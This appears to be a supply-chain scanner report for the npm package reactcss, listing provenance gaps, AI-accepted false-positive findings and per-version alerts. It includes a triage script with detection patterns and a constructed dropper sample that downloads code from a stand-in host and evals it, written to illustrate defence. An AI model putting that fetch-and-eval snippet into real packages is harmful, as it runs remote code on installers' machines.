reactcss
Bringing Classes to Inline Styles
Supply chain provenance
Status for the latest visible version.
Without SLSA provenance (npm's Sigstore-signed build attestation) there is no cryptographic link between this tarball and the public source; the axios compromise (March 2026) relied on exactly this gap.
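The check behind that status, as an added example written for this page (it is not the scanner's code and not part of reactcss): inspect an npm registry version record and report whether it carries a SLSA provenance attestation. The record shape (`dist.signatures`, `dist.attestations.url`, `dist.attestations.provenance.predicateType`) is my reading of the public registry's packument format and is an assumption; both sample records below are constructed so the block runs offline.

```javascript
// Added example, not the scanner's or reactcss's own code.
// Assumed packument shape: dist.signatures[] (registry signature) and
// dist.attestations { url, provenance: { predicateType } } when the
// version was published with `npm publish --provenance`.

// Constructed sample resembling a version with no attestations, which is
// what every reactcss version on this page reports. Values are placeholders.
const unattested = {
  name: "reactcss",
  version: "1.2.3",
  dist: {
    integrity: "sha512-CONSTRUCTED-PLACEHOLDER",
    tarball: "https://registry.npmjs.org/reactcss/-/reactcss-1.2.3.tgz",
    signatures: [{ keyid: "SHA256:constructed-registry-key", sig: "MEUC-constructed" }],
  },
};

// Constructed sample of a version published with provenance enabled in CI.
const attested = {
  name: "example-pkg",
  version: "2.0.0",
  dist: {
    integrity: "sha512-CONSTRUCTED-PLACEHOLDER-2",
    tarball: "https://registry.npmjs.org/example-pkg/-/example-pkg-2.0.0.tgz",
    signatures: [{ keyid: "SHA256:constructed-registry-key", sig: "MEQC-constructed" }],
    attestations: {
      url: "https://registry.npmjs.org/-/npm/v1/attestations/example-pkg@2.0.0",
      provenance: { predicateType: "https://slsa.dev/provenance/v1" },
    },
  },
};

function provenanceStatus(versionDoc) {
  const dist = versionDoc.dist || {};
  // A registry signature only proves the registry saw this exact tarball.
  // It says nothing about which source commit or CI run produced it.
  const registrySigned = Array.isArray(dist.signatures) && dist.signatures.length > 0;
  const att = dist.attestations;
  const predicate = att && att.provenance ? att.provenance.predicateType : null;
  // Only a SLSA provenance predicate ties the tarball to a source + builder.
  const isSlsa =
    typeof predicate === "string" && predicate.startsWith("https://slsa.dev/provenance/");
  const hasProvenance = Boolean(att && att.url) && isSlsa;
  return {
    name: `${versionDoc.name}@${versionDoc.version}`,
    registrySigned,
    hasProvenance,
    predicateType: predicate,
    finding: hasProvenance
      ? null
      : "Package was published without Sigstore provenance; the tarball cannot be tied to a source commit or build.",
  };
}

// Live lookup for a real package (not executed here; needs Node 18+ fetch).
async function fetchVersionDoc(name, version) {
  const res = await fetch(`https://registry.npmjs.org/${name}/${version}`);
  if (!res.ok) throw new Error(`registry returned ${res.status}`);
  return res.json();
}

console.log(provenanceStatus(unattested));
console.log(provenanceStatus(attested));
```

For packages already in a lockfile, `npm audit signatures` performs the equivalent check (registry signatures plus attestations) against the installed tree.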
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:modules/react-material-design/lib/components/Tabs.js | AI (source-diff): File is a compiled/minified CoffeeScript build artifact — standard for this package's toolchain (gulp-uglify, coffee-script). Code is benign React component logic with no malicious patterns. | ai | |
| publish-pattern | new-deps-added | AI (publish-pattern): Swap from monolithic lodash to lodash.isarray/lodash.isobject is a well-known legitimate refactoring pattern; both are official lodash org packages. | ai | |
| source-diff | source-size-tripled | AI (source-diff): Size increase is entirely due to addition of webpack-bundled docs assets (2MB common.js). No runtime payload injected. | ai | |
| source-diff | obfuscated-file:docs/build/documentation.js | AI (source-diff): webpack dev-mode bundle with eval() for source maps. Content is clearly React documentation components. False positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/documentation.js | AI (source-diff): eval() usage is webpack's development module evaluation with sourceURL annotations. Docs-only browser asset, not malicious. | ai | |
| source-diff | obfuscated-file:docs/build/home.js | AI (source-diff): webpack dev-mode bundle for docs homepage. Same pattern as documentation.js — React components in eval strings with source maps. False positive. | ai | |
| source-diff | net-exec-file:docs/build/home.js | AI (source-diff): Same webpack eval pattern as documentation.js. Browser-only docs asset, not a dropper/loader. | ai | |
| source-diff | obfuscated-file:docs/build/common.js | AI (source-diff): This is a webpack-bundled documentation site asset. Long lines are from minified webpack bootstrap code, not malicious obfuscation. Stable false positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/common.js | AI (source-diff): webpack's __webpack_require__ module loader triggers net+exec heuristic but is a standard browser bundler pattern, not malware. Docs-only asset. | ai | |
| source-diff | obfuscated-file:lib/transform.js | AI (source-diff): lib/transform.js is standard Babel-transpiled/minified output of ReactCSS component logic. The content is clearly legitimate compiled ES6 class code, not malicious obfuscation. | ai | |
| semgrep | semgrep:eval-usage | AI (semgrep): eval in lib/is.js is Babel-compiled output of a type-checking utility in a CSS-in-JS library. No evidence of malicious code execution patterns. | ai | |
| phantom-deps | phantom-dep:classnames | AI (phantom-deps): classnames is a legitimate runtime dependency; phantom-dep false positive for this package. | ai | |
| source-diff | net-exec-file:docs/build/bundle.js | AI (source-diff): File is a standard webpack 1.x documentation bundle (webpackBootstrap pattern). Network calls and dynamic requires are inherent to webpack bundles serving a docs site, not malware indicators. | ai | |
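The two rules accepted above (obfuscated-file: a line over 3000 characters; net-exec-file: network calls and dynamic code execution in one newly added file) and the question each acceptance hinges on, whether the flagged file can run at install or import time, as an added example written for this page. It is not the scanner's implementation: the regexes, the 3000-character threshold as applied here, and the reachability rules are assumptions, and the three sample files and package.json fragments are constructed.

```javascript
// Added example, not the scanner's or reactcss's own code.
const LONG_LINE_LIMIT = 3000; // the report's "lines over 3000 chars"

// Assumed pattern lists for the net-exec heuristic.
const NET_RE =
  /\bfetch\(|XMLHttpRequest|WebSocket|\bhttps?\.(get|request)\(|require\(["'](https?|net|dns)["']\)/;
const EXEC_RE = /\beval\(|\bnew Function\(|\bvm\.runIn\w+\(|require\(["']child_process["']\)/;

// obfuscated-file: any line longer than the limit. Minified bundler output
// trips this exactly like a packed payload does, hence the false positives.
function longLines(src, limit = LONG_LINE_LIMIT) {
  const hits = [];
  src.split("\n").forEach((text, i) => {
    if (text.length > limit) hits.push({ line: i + 1, length: text.length });
  });
  return hits;
}

// net-exec-file: network capability and dynamic execution in the same file.
function netExec(src) {
  const net = NET_RE.test(src);
  const exec = EXEC_RE.test(src);
  return { net, exec, flagged: net && exec };
}

// Coarse reachability (assumed rules): is the file named by an install
// lifecycle script, a bin entry, or main, or does it live in main's
// directory? This does not walk the require graph; it only separates
// shipped-but-inert assets (docs/) from code that can run on install/import.
function reachability(pkg, filePath) {
  const norm = (p) => p.replace(/^\.\//, "");
  const file = norm(filePath);
  const scripts = pkg.scripts || {};
  for (const hook of ["preinstall", "install", "postinstall", "prepare"]) {
    if (scripts[hook] && scripts[hook].includes(file)) {
      return { reachable: true, why: `referenced by scripts.${hook}` };
    }
  }
  const bins = typeof pkg.bin === "string" ? [pkg.bin] : Object.values(pkg.bin || {});
  if (bins.map(norm).includes(file)) return { reachable: true, why: "bin entry" };
  const main = norm(pkg.main || "index.js");
  if (file === main) return { reachable: true, why: "main entry" };
  const topDir = (p) => p.split("/")[0];
  if (main.includes("/") && topDir(main) === topDir(file)) {
    return { reachable: true, why: `lives under main's directory ${topDir(main)}/` };
  }
  return { reachable: false, why: "not an entry point and outside main's directory" };
}

function triage(pkg, filePath, src) {
  const obf = longLines(src);
  const ne = netExec(src);
  const reach = reachability(pkg, filePath);
  const findings = [];
  if (obf.length) findings.push(`obfuscated-file (${obf.length} line(s) > ${LONG_LINE_LIMIT})`);
  if (ne.flagged) findings.push("net-exec-file");
  let verdict = "clean";
  if (findings.length) verdict = reach.reachable ? "review" : "accept-candidate";
  return { file: filePath, findings, reachable: reach.reachable, why: reach.why, verdict };
}

// Constructed package.json fragments.
const reactcssPkg = { name: "reactcss", main: "lib/index.js", scripts: { build: "gulp" } };
const hookedPkg = {
  name: "not-reactcss",
  main: "index.js",
  scripts: { postinstall: "node scripts/setup.js" },
};

// Constructed webpack dev-mode bundle: eval() with a sourceURL plus the
// bundler's XMLHttpRequest-based reload client, padded past the limit.
const docsBundle =
  (
    "/******/ (function(modules) { function __webpack_require__(id) { " +
    'eval("module.exports = require(\\"react\\");//# sourceURL=webpack:///./docs/App.js"); ' +
    'var xhr = new XMLHttpRequest(); xhr.open("GET", "/__webpack_hmr"); }'
  ).padEnd(3200, " ") + "\n/******/ })({});";

// Constructed Babel output: one long minified line, no network and no eval.
const libTransform =
  '"use strict";var _createClass=function(){function a(b,c){for(var d=0;d<c.length;d++){}}}();'.padEnd(3100, ";");

// Constructed dropper shape: short, reachable from postinstall, net + eval.
const installHook =
  'const https = require("https");\n' +
  'https.get("https://example.invalid/p", r => { let b = ""; r.on("data", d => b += d); r.on("end", () => eval(b)); });\n';

function demoResults() {
  return [
    triage(reactcssPkg, "docs/build/home.js", docsBundle),
    triage(reactcssPkg, "lib/transform.js", libTransform),
    triage(hookedPkg, "scripts/setup.js", installHook),
  ];
}

console.log(JSON.stringify(demoResults(), null, 2));
```

The docs bundle trips both rules but is not reachable, which is the shape of every docs/build acceptance in the table; lib/transform.js is long-lined and reachable, so it still needs the content read before acceptance; the postinstall hook is short and unremarkable by line length and is the case the net-exec rule exists for.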
Versions (showing 26 of 26)
| Version | Deps | Published |
|---|---|---|
| 1.2.3 | 1 / 29 | |
| 1.2.2 | 1 / 29 | |
| 1.2.1 | 1 / 29 | |
| 1.2.0 | 1 / 29 | |
| 1.1.1 | 4 / 50 | |
| 1.1.0 | 4 / 50 | |
| 1.0.9 | 4 / 50 | |
| 1.0.8 | 4 / 49 | |
| 1.0.7 | 4 / 49 | |
| 1.0.6 | 4 / 49 | |
| 1.0.5 | 3 / 49 | |
| 1.0.4 | 3 / 49 | |
| 1.0.3 | 4 / 48 | |
| 1.0.2 | 4 / 48 | |
| 1.0.1 | 4 / 48 | |
| 0.4.6 | 4 / 47 | |
| 0.4.5 | 4 / 33 | |
| 0.4.4 | 4 / 33 | |
| 0.4.3 | 4 / 33 | |
| 0.4.2 | 3 / 30 | |
| 0.4.1 | 3 / 28 | |
| 0.4.0 | 3 / 28 | |
| 0.3.2 | 2 / 27 | |
| 0.3.1 | 2 / 27 | |
| 0.3.0 | 2 / 27 | |
| 0.2.0 | 2 / 23 | |
v1.2.3
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.2
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.1
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.2.0
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.1
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.1.0
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.9
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.8
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.7
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.6
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.5
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.4
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.3
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.2
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v1.0.1
2 findings:
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.6
2 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.5
2 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.4
2 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.3
2 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.2
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.1
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.4.0
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.2
1 finding: Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.1
7 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.3.0
7 findings:
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
Package was published without Sigstore provenance. Consider requesting the maintainer enable provenance via CI/CD.
v0.2.0
1 finding: Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.